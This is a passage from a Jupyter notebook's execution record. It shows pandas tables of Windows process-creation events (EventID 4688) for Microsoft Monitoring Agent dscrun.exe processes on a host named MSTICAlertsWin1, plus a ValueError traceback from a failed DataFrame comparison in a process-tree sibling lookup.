4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \n\n TimeGenerated \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:32:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:52:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:02:56.257 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:32:56.270 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:02:56.263 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.247 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:22:56.257 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:32:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:02:56.257 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:12:56.253 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:32:56.270 \n\n Computer \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \n\n SubjectUserSid \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \n\n SubjectUserName \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \n\n SubjectDomainName \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \n\n SubjectLogonId \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \n\n NewProcessId ... \\\nproc_key ... \nc:\\program files\\microsoft monitoring agent\\age... 0x15c8 ... \nc:\\program files\\microsoft monitoring agent\\age... 0xcd8 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x8dc ... \nc:\\program files\\microsoft monitoring agent\\age... 0xbd0 ... \nc:\\program files\\microsoft monitoring agent\\age... 0xe34 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x53c ... \nc:\\program files\\microsoft monitoring agent\\age... 0xef4 ... \nc:\\program files\\microsoft monitoring agent\\age... 0xd74 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x6f8 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x1fc0 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x10bc ... \nc:\\program files\\microsoft monitoring agent\\age... 0xb48 ... \n\n source_index_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \n\n ProcessId_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \n\n NewProcessName_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \n\n TimeGenerated_orig_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \n\n parent_key \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \n\n IsRoot IsLeaf IsBranch \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \n\n path parent_index \nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 1004/5 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/8 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/10 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/15 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/67 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/76 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/78 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/107 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/120 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/127 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/129 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/139 1004 \n\n[12 rows x 35 columns]" }, "execution_count": 49, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c", "text": "ptutil.get_siblings(p_tree, children.iloc[0])" }, "executionTime": "2019-12-13T21:02:09.459Z" }, { "cell": { "executionCount": 50, "executionEventId": "efe7205d-f552-4d8a-9298-e326b077cd67", "hasError": true, "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7", "outputs": [ { "ename": "ValueError", "evalue": "Can only compare identically-labeled DataFrame objects", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mValueError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_siblings\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mchildren\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m", "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\ops\\__init__.py\u001b[0m in \u001b[0;36mf\u001b[1;34m(self, other)\u001b[0m\n\u001b[0;32m 1565\u001b[0m \u001b[1;32mif\u001b[0m \u001b[1;32mnot\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_indexed_same\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mother\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1566\u001b[0m raise ValueError(\n\u001b[1;32m-> 1567\u001b[1;33m \u001b[1;34m\"Can only compare identically-labeled \"\u001b[0m \u001b[1;34m\"DataFrame objects\"\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1568\u001b[0m )\n\u001b[0;32m 1569\u001b[0m \u001b[1;32mreturn\u001b[0m \u001b[0mdispatch_to_series\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mother\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mfunc\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mstr_rep\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mValueError\u001b[0m: Can only compare identically-labeled DataFrame objects" ] } ], "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c", "text": "ptutil.get_siblings(p_tree, children.iloc[0]) == children" }, "executionTime": "2019-12-13T21:02:15.764Z" }, { "cell": { "executionCount": 51, "executionEventId": "dbacdfbc-e891-4c13-b6b5-5e3033f5ae74", "hasError": false, "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7", "outputs": [ { "data": { "text/html": "
\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
TenantIdAccountEventIDTimeGeneratedComputerSubjectUserSidSubjectUserNameSubjectDomainNameSubjectLogonIdNewProcessId...source_index_parProcessId_parNewProcessName_parTimeGenerated_orig_parparent_keyIsRootIsLeafIsBranchpathparent_index
proc_key
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 20:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x15c8...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/51004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xcd82019-02-09 20:52:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 20:52:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xcd8...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/81004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:02:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x8dc...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/101004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xbd02019-02-09 21:32:56.27000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:32:56.270MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xbd0...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/151004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xe342019-02-09 22:02:56.26300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:02:56.263MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xe34...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/671004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x53c2019-02-09 22:32:56.24700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:32:56.247MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x53c...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/761004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xef42019-02-09 22:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xef4...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/781004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xd742019-02-09 23:22:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:22:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xd74...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1071004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x6f82019-02-09 23:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x6f8...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1201004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x1fc02019-02-10 00:02:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:02:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1fc0...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1271004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x10bc2019-02-10 00:12:56.25300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:12:56.253MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x10bc...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1291004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xb482019-02-10 00:32:56.27000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:32:56.270MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xb48...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1391004
\n

12 rows × 35 columns

\n
", "text/plain": " TenantId \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n\n Account \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \n\n EventID \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \n\n TimeGenerated \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:32:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:52:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:02:56.257 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:32:56.270 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:02:56.263 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.247 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:22:56.257 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:32:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:02:56.257 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:12:56.253 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:32:56.270 \n\n Computer \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \n\n SubjectUserSid \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \n\n SubjectUserName \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \n\n SubjectDomainName \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP 